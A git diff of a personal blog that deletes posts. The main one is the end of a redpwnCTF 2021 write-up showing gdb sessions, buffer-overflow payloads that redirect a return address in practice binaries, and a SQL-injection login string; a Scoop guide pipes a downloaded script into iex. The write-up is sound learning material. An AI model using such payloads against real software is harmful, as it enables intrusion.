pipe input into the -program which makes it non-interactive. - -At this point I was about 12 hours in of straight gdb hell, and I was very -happy to see this shell. After discovering this, I immediately tried it outside -the debugger and was dissapointed to see that my exploit didn't work. After a -small panick attack I found out this was because of my environment variables. -You can launch an environment-less shell by using the `env -i sh` command: - -``` -λ generic → λ git master* → env -i sh -sh-5.1$ python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)" | ./beginner-generic-pwn-number-0 -"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨" -rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self! -can you write me a heartfelt message to cheer me up? :( -sh-5.1$ # another shell :tada: -``` - -Now it was time to actually do the exploit on the remote server. - -I whipped up the most disgusting and janky python code that I won't go into -detail about, but here's what is does (in short): - -1. Create a thread to capture data from the server and forward it to `stdout` -2. Capture user commands using `input()` and decide what to do with them on the main thread - -The code for this script can be found -[here](https://github.com/lonkaars/redpwn/blob/master/challenges/generic/pwn.py), -though be warned, it's _very_ janky and you're probably better off copying -stuff from stackoverflow. Writing your own tools is more fun though, and might -also be faster than trying to wrestle with existing tools to try to get them to -do exactly what you want them to do. In this case I could've also just used [a -simple -command](https://reverseengineering.stackexchange.com/questions/13928/managing-inputs-for-payload-injection?noredirect=1&lq=1). - -It did help me though and I actually had to copy it for use in the other buffer -overflow challenge that I solved, so I'll probably refactor it someday for use -in other CTFs. - -### crypto/round-the-bases - -This crypto challenge uses a text file with some hidden information. If you -open up the file in a text editor, and adjust your window width, you'll -eventually see the repeating pattern line up. This makes it very easy to see -what part of the pattern is actually changing: - -``` -----------------------xxxx---- -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -``` - -I wrote a simple python script to parse this into binary data, and it worked on -the first try: - -```py -# read the file into a string -file = open("./round-the-bases") -content = file.read() -file.close() - -# split on every 30th character into a list -n = 30 -arr = [ content[i : i + n] for i in range(0, len(content), n) ] - -bin = [] -for line in arr: - sub = line[16:20] # the part that changes - if sub == 'IIcu': # IIcu -> 0x0 - bin.append('0') - else: # K0o0 -> 0x1 - bin.append('1') - -bin = ''.join(bin) # join all the list indices together into a string - -# decode the binary string into ascii characters -for i in range(0, len(bin), 8): - print(chr(int(bin[i:i+8], 2)), end='') - -# newline for good measure -print("\n", end='') -``` - -### pwn/ret2generic-flag-reader - -This was the second binary exploitation challenge I tackled, and it went much -better than the first because I (sort of) knew what I was doing by now. - -I figured the 'ret2' part of the title challenge was short for 'return to', and -my suspicion was confirmed after looking at the c source: - -```c -#include <stdio.h> -#include <string.h> -#include <stdlib.h> - -void super_generic_flag_reading_function_please_ret_to_me() -{ - char flag[0x100] = {0}; - FILE *fp = fopen("./flag.txt", "r"); - if (!fp) - { - puts("no flag!! contact a member of rob inc"); - exit(-1); - } - fgets(flag, 0xff, fp); - puts(flag); - fclose(fp); -} - -int main(void) -{ - char comments_and_concerns[32]; - - setbuf(stdout, NULL); - setbuf(stdin, NULL); - setbuf(stderr, NULL); - - puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable..."); - puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!"); - puts("slap on some flavortext and there's no way rob will fire me now!"); - puts("this is genius!! what do you think?"); - - gets(comments_and_concerns); -} - -``` - -With my newfound knowledge of binary exploitation, I figured I would have to -overwrite the return pointer on the stack somehow, so the program calls the -`super_generic_flag_reading_function_please_ret_to_me` function that isn't -called at all in the original. - -The only input we have control over is again a call to `gets();` - -Let's look at the disassembly in gdb: - -``` -(gdb) disas main -Dump of assembler code for function main: - 0x00000000004013f4 <+79>: call 0x4010a0 <puts@plt> - 0x00000000004013f9 <+84>: lea rdi,[rip+0xca0] # 0x4020a0 - 0x0000000000401400 <+91>: call 0x4010a0 <puts@plt> - 0x0000000000401405 <+96>: lea rdi,[rip+0xd0c] # 0x402118 - 0x000000000040140c <+103>: call 0x4010a0 <puts@plt> - 0x0000000000401411 <+108>: lea rdi,[rip+0xd48] # 0x402160 - 0x0000000000401418 <+115>: call 0x4010a0 <puts@plt> - 0x000000000040141d <+120>: lea rax,[rbp-0x20] - 0x0000000000401421 <+124>: mov rdi,rax - 0x0000000000401424 <+127>: call 0x4010e0 <gets@plt> - 0x0000000000401429 <+132>: mov eax,0x0 - 0x000000000040142e <+137>: leave - 0x000000000040142f <+138>: ret -End of assembler dump. -``` - -We see again multiple calls to `<puts@plt>` and right after a call to -`<gets@plt>`. There is no `cmp` and `jne` to be found in this challenge though. - -The goal is to overwrite the _return address_. This is a memory address also -stored in memory, and the program will move execution to that memory address -once it sees a `ret` instruction. In this 'vanilla' state, the return address -always goes to the assembly equivalent of an `exit()` function. Let's see if we -can overwrite it by giving too much input: - -``` -(gdb) break *0x000000000040142f -Breakpoint 1 at 0x40142f -(gdb) run < <(python3 -c "print('a' * 56)") --- Breakpoint 1 hit -- -(gdb) info registers -rax 0x0 0x0 -rbx 0x401430 0x401430 -rsi 0x7ffff7f7d883 0x7ffff7f7d883 -rdi 0x7ffff7f804e0 0x7ffff7f804e0 -rbp 0x6161616161616161 0x6161616161616161 -rsp 0x7fffffffd898 0x7fffffffd898 -rip 0x40142f 0x40142f <main+138> -``` - -As you can see, the $rbp register is completely overwritten with `0x61`'s. -Let's check the $rsp register to see where the `main()` function tries to go -after `ret`: - -``` -(gdb) run -Starting program: ret2generic-flag-reader -alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... -how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! -slap on some flavortext and there's no way rob will fire me now! -this is genius!! what do you think? -a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 --- Breakpoint 1 hit -- -(gdb) x/1gx $rsp -0x7fffffffd898: 0x3363326331633063 -``` - -Let's use CyberChef to see what `0x3363326331633063` is in ascii! - - - -Hmm, it's backwards. Let's reverse it! - - - -Let's find the address of the super generic flag reading function with gdb. - -``` -(gdb) print super_generic_flag_reading_function_please_ret_to_me -$2 = {<text variable, no debug info>} 0x4011f6 <super_generic_flag_reading_function_please_ret_to_me> -``` - -Now we're ready to craft a string that exploits the program and runs the secret -function! - -``` -a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 <- original - c0c1c2c3 <- ends up in $rsp -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <- padding ( 0x28 * 'a' ) - - c 0 c 1 c 2 c 3 <- ends up in $rsp - 3 c 2 c 1 c 0 c <- reverse -0x3363326331633063 <- reverse (hex) -0x00000000004011f6 <- pointer we want in $rsp - f611400000000000 <- reverse - \xf6\x11\x40\x00\x00\x00\x00\x00 <- python bytestring - -exploit string: -b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00' -``` - -Now let's try it in an environment-less shell: - -``` -python3 -c "import sys; sys.stdout.buffer.write(b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00')" | ./ret2generic-flag-reader -alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... -how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! -slap on some flavortext and there's no way rob will fire me now! -this is genius!! what do you think? -flag{this_is_a_dummy_flag_go_solve_it_yourself} - -Segmentation fault (core dumped) -sh-5.1$ -``` - -### rev/bread-making - -For this challenge, I first tried using iaito again to do some program flow -analysis. After giving up on that, I decided to instead brute-force the correct -steps by hand. This was a very long and boring process. - -First I used `strings` again to extract all the dialogue and user input strings -from the binary. Then I filtered them to not include obvious dialogue, but only -the possible user input strings. And this is the correct path that gives the -flag: - -``` -add flour -add salt -add yeast -add water -hide the bowl inside a box -wait 3 hours -work in the basement -preheat the toaster oven -set a timer on your phone -watch the bread bake -pull the tray out with a towel -open the window -unplug the oven -unplug the fire alarm -wash the sink -clean the counters -flush the bread down the toilet -get ready to sleep -close the window -replace the fire alarm -brush teeth and go to bed -``` - -In hindsight I could've probably made a simple python script to brute force all -remaining possibilities until it got longer output from the program, but -laziness took over and I decided that spending 45 minutes doing very dull work -was more worth it instead. - -## Willem's part in the CTF - -Hi, Willem here. - -In this part I will talk about my experience during the CTF and The -collaboration between me and Loek. - -### web/orm-bad - -This was also my first CTF, just like Loek, because of this was quite uncertain -about my skill level. For example, I have no experience using Linux systems, -but from what I learned before the CTF it is quite essential. My fear of not -being able to do any of the challenges disappeared quickly after we had -completed the beginner challenges. With a simple sql injection I got my first -real flag: - -``` -username: admin';-- -password: -flag{this_is_a_dummy_flag_go_solve_it_yourself} -``` - -We had planned to use github's projects to track progress on challenges, but -when you're actually doing a challenge it's the last thing you think about. -So, we didn't really know who was doing which challenge, but because we're a -team of two this wasn't a big problem. - -The most challenge were a bit to hard for me. Some I would get pretty far, but -needed Loek's help to solve it. Others I didn't even attempt to begin on. - -### misc/the-substitution-game - -One challenge I spend a lot of time on was __The substitution game__. In the -substitution game you had to substitute certain parts of the input string to -get the desired output string. I got to level for of 6. Level 1 and 2 to were -really simple, but at level 3 you started to need to really understand the -game. - -``` -level 3: -initial: aaaaaaaaaaaaaa (the amount of a's varied) -target: a -``` - -The solution is really simple, but it's pretty hard to get to it. You want to -remove 'a's so I started with `a => `, this turn all 'a's to None and left you -with an empty string. The problem is you can't substitute anything in an empty -string. The solution was `aa => a`, this removed an 'a' every time the initial -string got checked. To get this solution you had to realize, that the program -would always substitute the first instance it would come across, and the -program was set to do way more than needed substitutions. This would come handy -in the next level. - -``` -level 4: -initial: ggggggggggg (the amount of g's varied) -target: ginkoid -``` - -After completing level 3 this level looks very easy, just substitute the g's -like before `gg => g` and turn the last g into ginkoid `g => ginkoid` , but -this didn't work because of the way the program worked, after getting to a -valid solution I didn't stop and the single g in ginkoid would also change to -ginkoid. You would get infinite ginkoid. The solution was: - -``` -gg => ginkoid; ginkoidginkoid => ginkoid; ginkoidg => ginkoid -``` - -I began with noticing you couldn't just change the g, because that would also -change the g in ginkoid. so double gg becomes ginkoid. We have to use the same -trick as in level 3 to gain only one ginkoid `ginkoidginkoid => ginkoid` -because of the way we changed the single g's to ginkoid it would only work with -an even amount of g's. In the case there was an uneven amount of g's we would -be left with ginkoidg, so we remove it `ginkoidg => ginkoid`. - -I found this challenge really enjoyable and during this challenge I noticed -that I most enjoy the puzzle aspect of computer science, puzzling for hours to -fix a bug and then finally finding a solution. - -I didn't complete many challenges and wasn't really able to help Loek, but I -really enjoyed the CTF. It's a really fun way to test your skills and -knowledge. In the end I'm really happy with the score we (mostly Loek) got and -I think I’ll take part in other CTFs in the future. - -## Epilogue - -Of the 47 total challenges, me and Willem only solved 15. My end goal for this -CTF wasn't winning to begin with, so the outcome didn't matter for me. After -the second day I set the goal of reaching the 3rd page of the leaderboards as -my goal, and we reached 277'th place in the end which made my mom very proud! - - - -I enjoyed the CTF a lot! There were some very frustrating challenges, and I -still don't get how people solved web/wtjs, but that's fine. I did learn how to -use GDB and a lot of other things during the CTF which were all very rewarding. -I will definitely be participating in the 2022 redpwnCTF, and maybe even some -others if they're beginner friendly :) - -During the Radboud CTF and this CTF I've accumulated a lot of ideas to maybe -host one myself, though I have no clue where to start with that. Maybe keep an -eye out for that ;) - diff --git a/posts/scoop.md b/posts/scoop.md deleted file mode 100644 index aa60934..0000000 --- a/posts/scoop.md +++ /dev/null @@ -1,115 +0,0 @@ -[meta]: <title> (Scoop guide) -[meta]: <subtitle> (Handbook and quick explanations) -[meta]: <author> (Loek) -[meta]: <date> (July 22 2021) -[meta]: <tags> (windows, normie, software) -[meta]: <cover> (/img/scoop.png) - -Here's a quick reference for returning customers: - -```bash -# installing stuff -scoop install <program name> - -# removing stuff -scoop uninstall <program name> - -# updating all the stuff -scoop update * - -# update single stuff -scoop update <program name> - -# add a bucket / repository -scoop bucket add <bucket name> - -# searching for stuff -scoop search <search term> -# keep in mind that scoop's search is very slow -``` - -For more things look in the [wiki](https://github.com/lukesampson/scoop/wiki) -or in the wiki's [faq](https://github.com/lukesampson/scoop/wiki/FAQ). - -Now here's a list of things that people who don't use `cmd` get confused about: - -- Highlighting text in cmd selects it. If you've selected text, right click - copies it. If you don't have text selected, right click pastes it. -- Ctrl-c and ctrl-v won't work as you expect them to. The same goes for most - keyboard shortcuts commonly used in graphical ('normal') programs. Ctrl-c is - used to stop programs in cmd, and ctrl-v doesn't do anything. The keyboard - shortcut for pasting in cmd is shift+insert. -- Clicking inside the cmd window to place your text cursor doesn't work, - because clicking is only used for selection. You'll have to use your arrow - keys to move the cursor. You can also use ctrl-a to move it to the beginning - of a line, or ctrl-e to move it to the end of a line. -- It's normal for programs in cmd to not give any output and just silently - quit. This is normal and if a program doesn't output anything you can assume - it did the thing you wanted it to do. (though scoop is very verbose and will - print progress info most of the time) -- You can type new commands for the computer to execute once you see the prompt - again. Most of the time it looks something like this: - - ``` - C:\Windows\System32> - ``` - -## Installation (on a fresh system) - -```powershell -Set-ExecutionPolicy RemoteSigned -scope CurrentUser -iwr -useb get.scoop.sh | iex -``` - -## Some more things explained - -### Why scoop at all - -Scoop is a package manager. These are the primary way you install software on -Linux. The reason package managers are awesome, is because it's like an app -store in the sense that it's one central place to install all your software, -but without the downsides of an actual app store. - -If you develop your own software, you can write a scoop install script for it, -and create a pull request on GitHub. This way basically anyone can add software -into scoop, but it's still moderated better than for example wikipedia. - -Scoop also has more open source software, which is better (most of the time). -This means you're more likely to get 'better software' like 7-zip instead of -(bad) (paid) software like winrar or winzip. - -Scoop also uses powershell scripts to install software which means you won't -have to click through installers, or watch out for sneaky buttons that also -install some weird toolbar in your browser. - -### Buckets - -Buckets are a collection of similar programs. The way these are managed is -through something called a repository. This is just a central place for -multiple people to view and collaborate on scoop at once. - -Buckets you'll probably want to add are `extras`, `nonportable`, `games`, and -`java`. - -By adding a bucket you're not actually installing any software, but scoop will -check for updates on that bucket. - -If you want to for example install java using scoop, you'll first have to add -the `java` bucket by running `scoop bucket add java` in order for scoop to be -able to find the `openjdk` package. Then you can run `scoop install openjdk`, -and then you'll have java installed. - -### Brave (browser) - -Because the default brave browser in scoop isn't updated, I use the [everonline -repo](https://github.com/everonline/brave). Here's how to do that: - -```bash -scoop bucket add everonline https://github.com/everonline/brave.git -scoop install everonline/brave -``` - -## Awesome software - -[Here's](/post/software#pc-software) a list of the software I use pretty much every day, -and some of it is also available for windows using scoop! diff --git a/posts/software.md b/posts/software.md deleted file mode 100644 index 2a06fed..0000000 --- a/posts/software.md +++ /dev/null @@ -1,275 +0,0 @@ -[meta]: <title> (Software that I use) -[meta]: <subtitle> (Desktop software, server software, phone apps, everything) -[meta]: <author> (Loek) -[meta]: <date> (April 13 2021) -[meta]: <tags> (software, open source, server, phone) -[meta]: <cover> (/img/software.png) - -## PC software - -All of the software on this page is cool and I think you should try it. I also -use all of this software, and will update this page when I find new, *even -cooler* software to use instead. Most if not all of my configuration files -(dotfiles) are on my [github](https://github.com/lonkaars/dotfiles). You can -clone these and edit them to fit your needs, or you can use them as a reference -for when you can't figure out how to configure something. - -### Regular software - -- **Email client**: [neomutt](https://neomutt.org/). It's fast and simple, - though configuring it was a pain in the ass. I'm currently using it in - combination with mbsync and imapnotify to get notifications for new emails, - and sync my mailbox for fast email viewing. - -- **Music player**: [mpd](https://www.musicpd.org/) with - [ncmpcpp](https://github.com/ncmpcpp/ncmpcpp). This is the best music setup - I've ever used. I download all my music in .flac format and mpd *just works*. - Since mpd has a server-client structure, I could also use this to set up - multiple devices that can add music to a central queue at a party or - something, but I just use it to launch [an fzf mpc - wrapper](https://github.com/DanielFGray/fzf-scripts/blob/master/fzmp) to - quickly add music while I'm doing something else. - -- **Text editor**: [nvim](https://neovim.io/). It's vim. If you don't like vim, - you should try using it longer. If you still don't like vim, you can use - [code oss](https://appimage.github.io/Code_OSS/) which is visual studio code - but without Microsoft's creepy telemetry features. - -- **PDF viewer**: [zathura](https://pwmt.org/projects/zathura/). It's a pdf - viewer with vim bindings, and it works with my TeX editing setup's live - reload thingy. - -- **Image viewer**: [sxiv](https://github.com/muennich/sxiv). It's like zathura - but for images, but it also does a bunch of other stuff that I don't use very - often. - -- **Browser**: [brave](https://brave.com/). It's a normie-friendly chromium - fork with extra privacy features! I of course use brave (or any - chromium-based browser) with [tampermonkey](https://www.tampermonkey.net/), - [ublock origin](https://ublockorigin.com/), - [stylus](https://github.com/openstyles/stylus) and [dark - reader](https://darkreader.org/). - -- **Terminal**: [st](https://st.suckless.org/). It's fast and simple, nothing - to complain about. I have my [own st fork](https://github.com/lonkaars/st), - with a bunch of patches that make me happy. - -- **Password manager**: [bitwarden](https://bitwarden.com/). Open source - password manager that you can host yourself. It also has public servers which - are mostly free, but some features like time-based one-time passwords are - paid. All the clients are also open source. - -- **Document typesetting**: [LaTeX](https://www.latex-project.org/) (using - [latexmk](https://personal.psu.edu/~jcc8/software/latexmk/) with the - [XeTeX](http://xetex.sourceforge.net/) compiler). - -- **File browser**: [ranger](https://github.com/ranger/ranger). It's kind of - slow, but I use the bulkrename feature very often, and I haven't gotten used - to the perl `rename` script yet. - -- [unar](https://github.com/MacPaw/XADMaster). I like running `unar [archive]` - instead of using `7z`, `tar`, `unzip`, etc. It creates a new folder to unpack - to automatically so it does exactly what I need. - -### OS stuff - -- **Window manager**: [i3-gaps](https://github.com/Airblader/i3). I tried it - once and didn't switch back so this is a winner I guess. I've also heard good - things about [dwm](https://dwm.suckless.org/), though I haven't used it - myself. Most people complain about i3's limited configurability, but I - haven't ran into something that it doesn't do for me. - -- **Application launcher**: [rofi](https://github.com/davatorium/rofi). I've - been using rofi since I started using linux, and haven't switched to anything - else because it's *very* configurable, and has a dmenu mode for using it - instead of dmenu with other scripts. I use it primarily as my application - launcher, but I also have a hotkey setup to launch `bwmenu` which is a script - that fills in bitwarden passwords using rofi. - -- **Shell**: [zsh](https://www.zsh.org/) with [oh-my-zsh](https://ohmyz.sh/). - It's zsh, all the cool kids use it already. I do have `/usr/bin/sh` `ln -s`'d - to `/usr/bin/bash`, but I'd like to change that to `/usr/bin/dash`. Eh, I'll - get around to it someday. - -- **Status Bar**: [polybar](https://github.com/polybar/polybar). Simple bar, - gets the job done, the configuration files make me go insane though. It took - me a good half year of ricing to understand the polybar configuration files, - and I'm still not sure if I do. - -- **Notification daemon**: [dunst](https://dunst-project.org/). I used to use - deadd-notification-center, but that has waaaay too many haskell dependencies - on arch, so I don't use that anymore. - -- **Global keybinds**: - [xbindkeys](https://www.nongnu.org/xbindkeys/xbindkeys.html). Simple - configuration, works flawlessly, 10/10. - -- **Compositor**: [picom](https://github.com/yshui/picom). It's a simple - compositor. I use it to enable vsync for desktop windows, and I have it set - up to only show a drop shadow on floating i3 windows. - -### Closed source - -- [discord](https://discord.com/). Gamer. The only reason this is listed here - is because I use discord with - [betterdiscord](https://github.com/rauenzi/BetterDiscordApp) (which *is* - open-source). Betterdiscord allows you to use custom css themes, custom - plugins and a whole bunch of other cool stuff that regular discord doesn't - do. It's technically against TOS, but I don't really care as I only use - quality of life improvement plugins. - -- [figma](https://figma.com). It's the designing software that I use to create - user interface or website mockups. It's easily accessible though a browser, - and it uses webassembly so it's also decently fast. It's free for personal - use. - -## Server software - -This is the software that runs on my home server. - -### Email - -I used [Luke Smith's](http://lukesmith.xyz/) -[emailwiz](https://github.com/LukeSmithxyz/emailwiz) to set up my email server. -The script installs and configures an email setup with -[postfix](http://www.postfix.org/), [dovecot](https://www.dovecot.org/), -[spamassassin](https://spamassassin.apache.org/) and -[opendkim](http://www.opendkim.org/). - -### Etesync - -I run my own [etesync](https://www.etesync.com/) server for synchronizing my -to-do lists, calendar and contacts. It's relatively easy to set up, and has a -web interface that you can use with your own self-hosted instance. - -### Bitwarden - -I also run my own [bitwarden](https://github.com/bitwarden/server) server. It -uses docker with docker-compose, which are two things that I'm supposed to know -about, but I don't. - -I'm working on a connect 4 website myself, and I'm planning on learning to use -docker with docker-compose to make it easier to run the seperate parts that are -needed to host the project. - -### Git - -I have a [cgit](https://git.zx2c4.com/cgit/about/) server to host my git -repositories on <https://git.pipeframe.xyz>, and I use -[gitolite](https://gitolite.com/gitolite/) for ssh git push access. Cgit is -very easy to set up, and I like it very much. Gitolite on the other hand is a -pain in the ass to set up, because the documentation is not that great. If -you're planning on using gitolite on your own server, set the umask in -`~/.gitolite.rc` of your server's git account to `0022`. - -### SFTP - -I have two semi-public sftp accounts set up on my server: `media` and `sftp`. -`sftp` is for generic file sharing, and `media` is for my media. Both accounts -have tty login disabled and are chroot-jailed to /var/media and /var/sftp. - -## Phone apps - -These are the apps that I use on my phone. I recently upgraded my 2017 Nokia 6 -to a Google Pixel 4a (sunfish). It's a great phone! You can root it or flash -custom rom's very easily, and it gave me new appreciation for the basic -features of a smartphone. The Pixel 4a has really good haptics. They're almost -iPhone level, though I won't be using iPhones any time soon. - -I flashed [CalyxOS](https://calyxos.org/) as soon as it was 5 minutes out of -the box, but ended up not liking it because of it's nonexistant root support. -I'm currently using [LineageOS](https://lineageos.org/) 18.1, rooted using -[magisk](https://github.com/topjohnwu/Magisk). - -### Open source - -- **One-time password generator**: [andotp](https://github.com/andOTP/andOTP) - -- **App store**: [aurora store](https://gitlab.com/AuroraOSS/AuroraStore). This - app works better when you're rooted, but it's way better than the google play - store. - -- **App store**: [aurora f-droid](https://gitlab.com/AuroraOSS/auroradroid) - -- **Password manager**: [bitwarden](https://github.com/bitwarden/mobile) - -- **Browser**: [bromite](https://www.bromite.org/). This is basically ungoogled - chromium but for mobile. - -- **Calendar**: [etar](https://github.com/Etar-Group/Etar-Calendar) - -- [etesync](https://github.com/etesync/android) - -- **File browser**: [material - files](https://github.com/zhanghai/MaterialFiles). It looks sexy, it's free, - it's awesome. - -- **Email client**: [k-9](https://k9mail.app/). - -- **Maps**: [osmand](https://osmand.net/). - -- **Music player**: [shuttle](https://www.shuttlemusicplayer.com/). It looks - sexy, it's free, it's awesome. - -- **Instant messenger**: [signal](https://signal.org/). [papa musk said - it](https://twitter.com/elonmusk/status/1347165127036977153). - -- **Manga reader**: [tachiyomi](https://tachiyomi.org/) - -- **To-do lists**: [tasks.org](https://tasks.org/). This is easily the best - to-do app I've ever used, and it integrated very well with etesync. - - If you're cheap (like me), you can get 'free' pro by downloading this app - through f-droid instead of the play store. It's still nice to donate. - -- **Smart home control**: [home assistant](https://www.home-assistant.io/). - [the whole spiel](/post/homeauto). - -- **Notes**: [leaflet](https://github.com/PotatoProject/Leaflet). It's - basically Google Keep but open source and without Google. It's part of the - PotatoProject which is a custom Android rom, and there were plans for an open - source notes sync server that you could host yourself, but I haven't seen - that pop up yet. - - The app is written in Flutter, and did have choppy scrolling animations on my - old phone. I'm not sure if that was a bug or my old phone just being - underpowered, but it's something I want to mention anyways. - -- **Weather**: [geometric - weather](https://f-droid.org/en/packages/wangdaye.com.geometricweather/). - It's really good. Good animations, live wallpaper, fast, etc. - -- **RSS Reader**: [tiny tiny - rss](https://www.f-droid.org/en/packages/org.fox.tttrss/). This app requires - that you host your own tiny tiny rss server, but I do and the app works - great! - -- **Myanimelist client**: [moelist](https://github.com/axiel7/MoeList). I don't - know how I found this app but it's a real gem. If you use MAL you should - download this app. - -- **PDF reader**: [pdf viewer - plus](https://f-droid.org/en/packages/com.gsnathan.pdfviewer/). This is the - only one that's actually decent. Good UI, good UX, pretty fast rendering. - 9/10 - -### Requires root - -- **Ad-blocker**: [adaway](https://adaway.org/). It does have a rootless mode, - though the app warns you that it's slower and impacts your battery life - negatively. - -- **Theme engine**: [substratum](https://github.com/substratum/substratum). - Substratum requires root on android 9+, unless you're on stock samsung (one - ui). Android 8 and under users can buy - [andromeda](https://play.google.com/store/apps/details?id=projekt.andromeda). - Samsung users can buy - [synergy](https://play.google.com/store/apps/details?id=projekt.samsung.theme.compiler). - They're both developed by the same people behind substratum, but they're not - open source. - -### Closed source - -- **Reddit client**: - [sync](https://play.google.com/store/apps/details?id=com.laurencedawson.reddit_sync) - diff --git a/posts/style.scss b/posts/style.scss new file mode 100644 index 0000000..b1a363f --- /dev/null +++ b/posts/style.scss @@ -0,0 +1,19 @@ +--- +--- + +// fill width +#posts { + table-layout: auto; + width: 100%; +} + +// fit date column +#posts td:nth-child(1), +#posts th:nth-child(1) { + white-space: nowrap; + width: 1%; +} + +// dates with table numerals +#posts td:nth-child(1) { font-feature-settings: "tnum"; } + |